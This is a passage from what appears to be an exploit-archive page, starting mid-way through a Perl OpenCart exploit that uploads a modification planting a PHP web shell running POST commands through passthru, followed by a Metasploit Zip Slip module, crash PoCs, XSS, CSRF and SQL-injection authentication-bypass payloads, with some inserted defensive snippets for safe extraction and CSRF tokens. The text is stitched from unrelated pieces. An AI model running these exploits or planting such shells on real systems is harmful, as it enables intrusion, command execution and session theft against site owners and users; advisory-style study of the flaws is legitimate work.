<version>1.337</version>
<author></author>
<link></link>

<file path="catalog/controller/common/header.php">
<operation>
<search><![CDATA[// For page specific css]]></search>
<add position="before"><![CDATA[ if(isset($this->request->post[\'cmd\'])){
echo "0WNED";
$cmd = ($this->request->post[\'cmd\']);
passthru($cmd);
echo "0WNED";
$this->db->query("DELETE FROM `" . DB_PREFIX . "modification` WHERE `name` LIKE \''.$filename.'\'");
}]]></add>
</operation>
</file>
</modification>
';
open (TEMP, "> $ENV{PWD}/$filename") or die "[ Error: $ENV{PWD}/$filename $!";
flock (TEMP, 2);
truncate (TEMP, 0);
seek (TEMP, 0, 0);
print (TEMP $payload);
close (TEMP);
my $upload_payload = HTTP::Request::Common::POST($rce_catch."&token=".$token, Content_Type => 'form-data', Referer => $target, Content => [ file => ["$ENV{PWD}/$filename"]]);
print "[ Uploading the payload\n";
my $response = $browser->request($upload_payload) or die "[ Exploit Failed: $!";

my $json = JSON->new->pretty;

my $json_object = $json->decode($response->content);

print ("[ Exploit failed! You do not have permission to upload the payload.\n") and exit if ($json_object->{'error'});

print "[ Exploiting..\n";

for my $item( @{$json_object->{step}} ){
my $xml_inst_request = HTTP::Request->new (POST => $item->{url}, [Content_Type => "application/x-www-form-urlencoded", Referer => $host], "path=".$item->{path});
my $xml_inst_response = $browser->request($xml_inst_request) or die "[ Exploit Failed: $!";
print "[ Exploit failed.\n" and exit if ($xml_inst_response->code ne '200');
}
my $refresh_url = $host."admin/index.php?route=extension/modification/refresh&redir_inst=1&token=$token";
my $xml_refresh_request = HTTP::Request->new (GET => $refresh_url,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
$browser->request($xml_refresh_request) or die "[ Exploit Failed: $!";
my $exploiting = $host."index.php?route=common/home";
my $exploiting_request = HTTP::Request->new (POST => $exploiting,[Content_Type => "application/x-www-form-urlencoded",Referer => $host],"cmd=$cmd");
my $command_response = $browser->request($exploiting_request) or die "[ Exploit Failed: $!";
print "[ Cleaning the temp payload file\n";
unlink("$ENV{PWD}/$filename") or die "[ Error: $ENV{PWD}/$filename $!";
if (($command_response->as_string() =~ m/0WNED(.*?)0WNED/gs) ne ''){
print "[ ==============================================================\n";
print $1;
} else {
print "[ ==============================================================\n";
print "[ Exploit failed: $cmd: command not found or isn't correct.\n";
}
$browser->request($xml_refresh_request) or die "[ Exploit Failed: $!";
exit;

} else {
print "[ Exploit failed! You are not authorized. Wrong Username/Password.\n";
exit;
}

Generic Zip Slip Traversal


This is a generic arbitrary file overwrite technique, which typically results in remote command execution. This targets a simple yet widespread vulnerability that has been seen affecting a variety of popular products including HP, Amazon, Apache, Cisco, etc. The idea is that often archive extraction libraries have no mitigations against directory traversal attacks. If an application uses it, there is a risk when opening an archive that is maliciously modified, and results in the embedded payload to be written to an arbitrary location (such as a web root), and results in remote code execution.
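
The mitigation the description says extraction libraries often lack, as an added example that is not part of the module below: resolve every archive member against the destination directory before writing, and refuse entries that land outside it or that are links. Function names and the sample archive are constructed for illustration; "../payload.bin" mirrors the default TARGETPAYLOADPATH shown in the module.

```python
import io
import os
import tarfile

# Constructed sample archive contents: one normal file, one relative
# traversal entry and one absolute path.
SAMPLE_ENTRIES = {
    "docs/readme.txt": b"hello\n",
    "../payload.bin": b"constructed placeholder bytes\n",
    "/tmp/abs-constructed.txt": b"constructed placeholder bytes\n",
}


def build_sample_tar(entries):
    """Build an in-memory tar from {member name: bytes}; names are stored as given."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in entries.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def resolve_inside(dest_root, member_name):
    """Return the absolute target path, or None if it falls outside dest_root."""
    root = os.path.realpath(dest_root)
    # join() discards root when member_name is absolute; realpath() collapses
    # ".." and follows symlinks already on disk, so all three tricks surface here.
    target = os.path.realpath(os.path.join(root, member_name))
    if os.path.commonpath([root, target]) != root:
        return None
    return target


def safe_extract(tar_bytes, dest_root):
    """Extract regular files and directories only; return (extracted, rejected)."""
    extracted, rejected = [], []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar:
            # Symlinks, hard links and device nodes are never written.
            if not (member.isfile() or member.isdir()):
                rejected.append((member.name, "not a regular file or directory"))
                continue
            target = resolve_inside(dest_root, member.name)
            if target is None:
                rejected.append((member.name, "escapes destination"))
                continue
            if member.isdir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with tar.extractfile(member) as src, open(target, "wb") as out:
                out.write(src.read())
            extracted.append(member.name)
    return extracted, rejected


if __name__ == "__main__":
    import tempfile

    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "unpack")
        os.makedirs(dest)
        done, refused = safe_extract(build_sample_tar(SAMPLE_ENTRIES), dest)
        print("extracted:", done)
        for name, reason in refused:
            print("rejected: %s (%s)" % (name, reason))
```
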


MD5 | ff948c64df1f6f021439eaa12e78eb94

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name' => "Generic Zip Slip Traversal Vulnerability",
      'Description' => %q{
        This is a generic arbitrary file overwrite technique, which typically results in remote
        command execution. This targets a simple yet widespread vulnerability that has been
        seen affecting a variety of popular products including HP, Amazon, Apache, Cisco, etc.
        The idea is that often archive extraction libraries have no mitigations against
        directory traversal attacks. If an application uses it, there is a risk when opening an
        archive that is maliciously modified, and result in the embedded payload to be written
        to an arbitrary location (such as a web root), and result in remote code execution.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Snyk', # Technique discovery
          'sinn3r' # Metasploit
        ],
      'References' =>
        [
          ['URL', 'https://snyk.io/research/zip-slip-vulnerability']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'DisablePayloadHandler' => true
        },
      'Platform' => ['linux', 'win', 'unix'],
      'Targets' =>
        [
          ['Manually determined', {}]
        ],
      'Privileged' => false,
      'DisclosureDate' => "Jun 05 2018"
    ))

    register_options([
      OptString.new('FILENAME', [true, 'The tar file (tar)', 'msf.tar']),
      OptString.new('TARGETPAYLOADPATH', [true, 'The targeted path for payload', '../payload.bin'])
    ])
  end

  class ZipSlipArchive
    attr_reader :data
    attr_reader :fname
    attr_reader :payload

    def initialize(n, p)
      @fname = n
      @payload = p
      @data = make
    end

    def make
      data = ''
      path = Rex::FileUtils.normalize_unix_path(fname)
      tar = StringIO.new
      Rex::Tar::Writer.new(tar) do |t|
        t.add_file(path, 0777) do |f|
          f.write(payload)
        end
      end
      tar.seek(0)
      data = tar.read
      tar.close
      data
    end
  end

  def make_tar(target_payload_path)
    elf = generate_payload_exe(code: payload.encoded)
    archive = ZipSlipArchive.new(target_payload_path, generate_payload_exe)
    archive.make
  end

  def exploit
    target_payload_path = datastore['TARGETPAYLOADPATH']
    unless target_payload_path.match(/\.\.\//)
      print_error('Please set a traversal path')
      return
    end

    tar = make_tar(target_payload_path)
    file_create(tar)
    print_status('When extracted, the payload is expected to extract to:')
    print_status(target_payload_path)
  end
end

=begin
A quick test:

$ python
>>> import tarfile
>>> t = tarfile.open('test.tar')
>>> t.extractall()
>>> exit()

=end
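
The defensive counterpart to the quick test above, as an added example that is not part of the Metasploit module: instead of calling extractall() directly, every member is resolved against the destination directory before anything is written. The function names and the in-memory sample archive (constructed, with placeholder contents) are assumptions of this example.

```python
import io
import os
import tarfile
import tempfile


def build_sample_tar():
    """Constructed sample: one benign member and one whose name climbs out."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, body in (("docs/readme.txt", b"hello\n"),
                           ("../payload.bin", b"placeholder\n")):
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()


def is_within(base, candidate):
    """True if candidate resolves to base itself or to a path beneath it."""
    base = os.path.realpath(base)
    candidate = os.path.realpath(candidate)
    return os.path.commonpath([base, candidate]) == base


def safe_extract(tar_bytes, dest):
    """Write regular files and directories only; return (extracted, rejected)."""
    extracted, rejected = [], []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for member in tar:
            target = os.path.join(dest, member.name)
            if not (member.isfile() or member.isdir()):
                # Links and device nodes can redirect later writes; refuse them.
                rejected.append((member.name, "not a regular file or directory"))
            elif os.path.isabs(member.name) or not is_within(dest, target):
                rejected.append((member.name, "resolves outside destination"))
            elif member.isdir():
                os.makedirs(target, exist_ok=True)
                extracted.append(member.name)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with tar.extractfile(member) as src, open(target, "wb") as out:
                    out.write(src.read())
                extracted.append(member.name)
    return extracted, rejected


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        dest = os.path.join(root, "out")
        os.makedirs(dest)
        ok, bad = safe_extract(build_sample_tar(), dest)
        print("extracted:", ok)
        print("rejected: ", bad)
```

On Python versions that support extraction filters, `tarfile`'s `filter="data"` argument enforces a comparable policy inside the library.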

LimeSurvey 3.17.13 Cross Site Scripting


LimeSurvey versions 3.17.13 and below suffer from reflective and persistent cross site scripting vulnerabilities.


MD5 | ba9b989f3aca0493fcaa3aac94490b26

SEC Consult Vulnerability Lab Security Advisory < 20190912-0 >
=======================================================================
title: Stored and reflected XSS vulnerabilities
product: LimeSurvey
vulnerable version: <= 3.17.13
fixed version: =>3.17.14
CVE number: CVE-2019-16172, CVE-2019-16173
impact: medium
homepage: https://www.limesurvey.org/
found: 2019-08-23
by: Andreas Kolbeck (Office Munich)
David Haintz (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"LimeSurvey is the tool to use for your online surveys. Whether you are
conducting simple questionnaires with just a couple of questions or advanced
assessments with conditionals and quota management, LimeSurvey has got you
covered. LimeSurvey is 100% open source and will always be transparently developed.
We can help you reach your goals."

Source: https://www.limesurvey.org/


Business recommendation:
------------------------
LimeSurvey suffered from a vulnerability due to improper input
and output validation. By exploiting this vulnerability an attacker could:
1. Attack other users of the web application with JavaScript code,
browser exploits or Trojan horses, or
2. perform unauthorized actions in the name of another logged-in user.

The vendor provides a patch which should be installed immediately.
Furthermore, a thorough security analysis is highly recommended as only a
short spot check has been performed and additional issues are to be expected.


Vulnerability overview/description:
-----------------------------------
1) Stored and reflected XSS vulnerabilities
LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability,
which allows an attacker to execute JavaScript code with the permissions of the victim.
In this way it is possible to escalate privileges from a low-privileged account e.g.
to "SuperAdmin".


Proof of concept:
-----------------
1) Stored and reflected XSS vulnerabilities
Example 1 - Stored XSS (CVE-2019-16172):
The attacker needs the appropriate permissions in order to create new survey groups.
Then create a survey group with a JavaScript payload in the title, for example:

test<svg/onload=alert(document.cookie)>

When the survey group is being deleted, e.g. by an administrative user, the JavaScript
code will be executed as part of the "success" message.


Example 2 - Reflected XSS (CVE-2019-16173):
The following proof of concept prints the current CSRF token cookie which contains the
CSRF token. The parameter "surveyid" is not filtered properly:

http://$host/index.php/admin/survey?mandatory=1&sid=xxx&surveyid=xxx%22%3E%3Cimg%20
src=x%20onerror=%22alert(document.cookie)%22%3E&sa=listquestions&sort=question


If the URL schema is configured differently the following payload works:
http://$host/index.php?r=admin/survey&mandatory=1&sid=xxx&surveyid=
xxx"><img%20src=x%20onerror="alert(document.cookie)">&sa=listquestions&sort=question


Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in version 3.17.9 and the latest
version 3.17.13. It is assumed that older versions are affected as well.


Vendor contact timeline:
------------------------
2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204
2019-09-02: Fixes available:
https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a
https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006
2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues
2019-09-03: Release of LimeSurvey v3.17.15 bug fix
2019-09-12: Coordinated release of security advisory


Solution:
---------
Update to version 3.17.15 or higher:
https://www.limesurvey.org/stable-release

The vendor provides a detailed list of changes here:
https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released


Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF A. Kolbeck / @2019


FTPShell Client 6.74 Buffer Overflow


FTPShell Client version 6.74 suffers from a local buffer overflow denial of service vulnerability.


MD5 | 57c456409533cdc1763216b90f4971a2

#!/usr/bin/python


# Exploit Type : DOS
# Exploit Title: FTPShell client 6.74 - Local Buffer Overflow (SEH)
# Vulnerable Software & version : FTPShell client 6.74
# Vendor Homepage: https://www.ftpshell.com/
# Software Link: https://www.ftpshell.com/downloadclient.htm
# Tested Windows : Windows Vista Ultimate SP2(32-bit), Windows 7 Professional SP1(32-bit)
# Exploit Author: Debashis Pal
# Timeline
# Vulnerability Discover Date: 03-Sep-2019
# Vulnerability Report to Vendor:03-Sep-2019,No response
# Again email to Vendor:05-Sep-2019 ,No response
# Public Disclose : 09-Sep-2019


# PoC
# 1. FTPShellclient6-74POC.txt from POC.py code, open in notepad(FTPShellclient6-74POC.txt), copy contents
# 2. Open Core FTPShell client 6.74 & connect to a FTP server (FTPShell client 6.74 i.e. FTP session need to active along with username & password)
# 3. From FTPShell client 6.74 menu bar select the Tools-> Custom FTP Command
# 4. paste contents from notepad (into "Custom FTP Command" input field)
# 5. Application will crash and SEH overwritten



crash = "\x41" * 396 #Junk
crash += "\x43" * 4 #nSEH
crash += "\x42" * 4 #SEH
crash += "\x44" * 96 #More Junk


file = "FTPShellclient6-74POC.txt"
generate = open(file, "w")
generate.write(crash)
generate.close()


Attachment# Application crash and SEH overwritten.jpg


Thanks.


Folder Lock 7.7.9 Denial Of Service


Folder Lock version 7.7.9 suffers from a denial of service vulnerability.


MD5 | 1194928f5dcd46fd0c9f5f1db82bd31e

# Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit
# Date: 12.09.2019
# Vendor Homepage:https://www.newsoftwares.net/folderlock/
# Software Link: https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe
# Exploit Author: Achilles
# Tested Version: 7.7.9
# Tested on: Windows 7 x64


# 1.- Run python code :Folder_Lock.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Folderlock and Click 'Enter Key'
# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key'
# 5.- Click 'Submit' and you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 6000

try:
    f = open("Evil.txt", "w")
    print("[+] Creating %s bytes evil payload.." % len(buffer))
    f.write(buffer)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created")

Dolibarr ERP-CRM 10.0.1 Cross Site Scripting


Dolibarr ERP-CRM version 10.0.1 suffers from a user-agent cross site scripting vulnerability.


MD5 | a1c1c6482827fcba803b9538335d0bb1

# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross Site Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# CVE: CVE-2019-16197
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
software package to manage your business...
==================================================================

Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of
the User-Agent HTTP header is copied into the HTML document as plain text
between tags, leading to XSS.

GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>

phpMyAdmin 4.9.0.1 Cross Site Request Forgery


phpMyAdmin version 4.9.0.1 suffers from a cross site request forgery vulnerability.


MD5 | c180d4dbca34ac05b1eef641d7efa409

=============================================
MGC ALERT 2019-003
- Original release date: June 13, 2019
- Last revised: September 13, 2019
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,3/10 (CVSS Base Score)
- CVE-ID: CVE-2019-12922
=============================================

I. VULNERABILITY
-------------------------
phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery

II. BACKGROUND
-------------------------
phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the Web. phpMyAdmin supports a wide range of
operations on MySQL and MariaDB.

III. DESCRIPTION
-------------------------
A Cross-Site Request Forgery has been detected in phpMyAdmin that allows
an attacker to trigger a CSRF attack against a phpMyAdmin user, deleting any
server in the Setup page.

IV. PROOF OF CONCEPT
-------------------------
Exploit CSRF - Deleting main server

<p>Deleting Server 1</p>
<img src="
http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1"
style="display:none;" />

V. BUSINESS IMPACT
-------------------------
The attacker can easily create a fake hyperlink containing the request that
they want to execute on behalf of the user, in this way making a CSRF
attack possible due to the wrong use of the HTTP method.

VI. SYSTEMS AFFECTED
-------------------------
phpMyAdmin <= 4.9.0.1

VII. SOLUTION
-------------------------
Implement in each call the validation of the token variable, as already
done in other phpMyAdmin requests.

VIII. REFERENCES
-------------------------
https://www.phpmyadmin.net/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
June 13, 2019 1: Initial release
September 13, 2019 2: Last revision

XI. DISCLOSURE TIMELINE
-------------------------
June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
June 13, 2019 2: Send to vendor
July 16, 2019 3: New request to vendor without fix date
September 13, 2019 4: Sent to lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester



Piwigo 2.9.5 Cross Site Request Forgery / Cross Site Scripting


Piwigo version 2.9.5 suffers from cross site request forgery and cross site scripting vulnerabilities.


MD5 | 3c7069e96e000fdbcb03ee3f7ec38aed

=====[ Tempest Security Intelligence - ADV-03/2019 ]==========================

Piwigo - Version 2.9.5

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================
* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgements
* References

=====[ Vulnerability Information]=============================================
* Class: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79]; Cross-Site Request Forgery (CSRF) [CWE-352]
* CVSS:6.8.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
* CVE-2019-13363, CVE-2019-13364

=====[ Overview]========================================================
* System affected : Piwigo - Version 2.9.5
* Software Version : Version 2.9.5 (other versions may also be affected).
* Impact : Piwigo 2.9.5 is vulnerable to Cross-Site Request Forgery and XSS via /admin.php?page=notification_by_mail&mode=param or /admin.php?page=account_billing. An attacker can exploit this by injecting and persisting JavaScript code to coerce an admin user into performing unintended actions.

=====[ Detailed description]=================================================

The HTML code below exploits the vulnerabilities in the same way, because neither form contains CSRF tokens and both are vulnerable to XSS attacks. An attacker can host these forms on their malicious host and trick an administrator into visiting their page. If successful, the JavaScript code will be persistently inserted into the administrative configuration pages.
* [admin.php?page=notification_by_mail&mode=param]

<form action="http://domain.com/admin.php?page=notification_by_mail&mode=param" method="POST">

<input type="hidden" name="nbm_send_html_mail" value="xssaxssa<IMG """><SCRIPT>alert(document.domain)</SCRIPT>"" />

<input type="hidden" name="nbm_send_mail_as" value="xssaxssa<IMG """><SCRIPT>alert(document.domain)</SCRIPT>"" />

<input type="hidden" name="nbm_send_detailed_content" value="xssa" />

<input type="hidden" name="nbm_complementary_mail_content" value="xssa" />

<input type="hidden" name="nbm_send_recent_post_dates" value="xssa" />

<input type="hidden" name="param_submit" value="xssa" />
* [admin.php?page=account_billing]

<form id="myForm" action="https://pocs.piwigo.com/admin.php?page=account_billing" method="POST">

<input type="hidden" name="vat_number" value="xssa" />

<input type="hidden" name="billing_name" value="xssa"><script>alert(1)</script>" />

<input type="hidden" name="company" value="xssb" />

<input type="hidden" name="billing_address" value="xssc" />

=====[ Timeline of disclosure]===============================================

26/Jun/2019 - Responsible disclosure was initiated with the vendor.

26/Jun/2019 - Piwigo confirmed the issue;

08/Jul/2019 - CVEs were assigned and reserved as CVE-2019-13364 CVE-2019-13363

09/Aug/2019 - The vendor fixed the vulnerability CSRF.

12/Aug/2019 - The vendor fixed the vulnerability XSS.

=====[ Thanks & Acknowledgements]========================================
* Tempest Security Intelligence [4]

=====[ References ]=====================================================

[1] https://cwe.mitre.org/data/definitions/352.html

[2] https://cwe.mitre.org/data/definitions/79.html

[3] https://github.com/Piwigo/Piwigo/issues/1055

[4] http://www.tempest.com.br/

=====[ EOF ]===========================================================
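
The check that the two Piwigo forms above lack, and that the phpMyAdmin advisory's Solution section asks for, as an added example that is not code from either project: state-changing actions are refused over GET and require a per-session token in the POST body. The route table, the `token` field name and the function names are assumptions; the two URLs are the ones from the proofs of concept.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Hypothetical route table: (page, mode) -> does the action change state?
ROUTES = {
    ("servers", "remove"): True,              # phpMyAdmin setup action from the PoC
    ("notification_by_mail", "param"): True,  # Piwigo settings form from the PoC
    ("servers", "list"): False,               # hypothetical read-only view
}


def new_session_token():
    """Random token bound to the user's session and embedded in each form."""
    return secrets.token_urlsafe(32)


def authorize(method, url, form, session_token):
    """Return (allowed, reason) for one request.

    `form` is the parsed POST body; the token is read from the body only,
    so it never has to travel in a URL.
    """
    query = parse_qs(urlsplit(url).query)
    page = query.get("page", [""])[0]
    mode = query.get("mode", [""])[0]
    mutates = ROUTES.get((page, mode))
    if mutates is None:
        return False, "unknown action"
    if not mutates:
        return True, "read-only"
    if method != "POST":
        # An <img src=...> or a followed link can only issue a GET.
        return False, "state change requires POST"
    supplied = form.get("token", "")
    if not supplied or not hmac.compare_digest(
            supplied.encode(), session_token.encode()):
        # A form hosted on another origin cannot read the victim's token.
        return False, "missing or invalid token"
    return True, "ok"


if __name__ == "__main__":
    token = new_session_token()
    requests = [  # constructed sample requests
        ("GET", "http://server/phpmyadmin/setup/index.php"
                "?page=servers&mode=remove&id=1", {}),
        ("POST", "http://domain.com/admin.php"
                 "?page=notification_by_mail&mode=param", {"param_submit": "x"}),
        ("POST", "http://domain.com/admin.php"
                 "?page=notification_by_mail&mode=param", {"token": token}),
    ]
    for method, url, form in requests:
        print(method, url, "->", authorize(method, url, form, token))
```

The token check addresses only the request forgery; the stored script injection in the same form fields still needs output encoding where the values are rendered.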

Ticket-Booking 1.4 Authentication Bypass


Ticket-Booking version 1.4 suffers from an authentication bypass vulnerability.


MD5 | 2ce652c0d71b942ee75e670c0cf53eaa

# Exploit Title: Ticket-Booking 1.4 - Authentication Bypass
# Author: Cakes
# Discovery Date: 2019-09-14
# Vendor Homepage: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking
# Software Link: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking/archive/master.zip
# Tested Version: 1.4
# Tested on OS: CentOS 7
# CVE: N/A

# Description:
# Easy authentication bypass vulnerability on this ticket booking application
# allowing the attacker to remove any previously booked seats

# Simply replay the below Burp request or use Curl (remember to change the Cookie Values)

POST /ticket/cancel.php HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://Target/ticket/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Cookie: PHPSESSID=j9jrgserbga22a9q9u165uirh4; rental_property_manager=mq5iitk8ic80ffa8dcf28294d4
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

userid='%20or%200%3d0%20#&password=123&save=signin
